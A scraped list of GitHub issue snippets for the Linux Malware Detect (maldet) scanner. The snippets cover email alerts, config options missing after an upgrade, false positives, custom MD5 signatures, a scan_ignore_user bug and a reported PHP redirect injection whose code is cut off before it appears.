
Linux Malware Detection (LMD)

Results 108 linux-malware-detect issues

Dear Team, This is the setting in my conf.maldet, however I don't receive any email when I run maldet -a /home/kvm. I have to email manually by using below...

After upgrading maldet from 1.6.3 to 1.6.4 with `maldet --update-ver` all the new slack options are missing from `/usr/local/maldetect/conf.maldet`. I thought that the updater would add new options automatically. Is...

Hi LMD, Thank you very much for providing this for everyone. How can I have LMD maldet list folders and files while it is scanning verifying they have been scanned...

Because of false positives with webalizer log files reported on https://github.com/rfxn/linux-malware-detect/issues/318 an account was reported suspended as follows: ``` HOST: ns1.custom.com SCAN ID: 181223-0838.23527 STARTED: Sat Dec 22 10:58:42 2018...

Hi! I have tried to add some custom MD5 signatures in the file "/usr/local/maldetect/sigs/custom.md5.dat". I have used both MD5 versions, but the file with the matched MDA/MD5 is not detected....

Just a quick note that I noticed that adguard and adguard DNS is blocking access to rfxn.com. ![2019-04-15_08h45_46](https://user-images.githubusercontent.com/379016/56142353-c39cb300-5f5b-11e9-885b-198528ee8518.png)

Modified view_report() with following changes: * added option 'newest' as alias to --report and --report "" to allow $ maldet --report newest [email protected] * properly email most recent report when...

enhancement

If you have a non-existent user specified in the scan_ignore_user setting then no files will be scanned when trying to run a scan. example in `/usr/local/maldetect/conf.maldet` ``` scan_ignore_user="test" ``` When...

I know that there was a pull request for this that was reverted for 1.6.4 but I think we should still look at fixing this. I just ran into this...

My client site got PHP inject; the impact is the site will redirect to the other site, and here is the code...

enhancement
investigate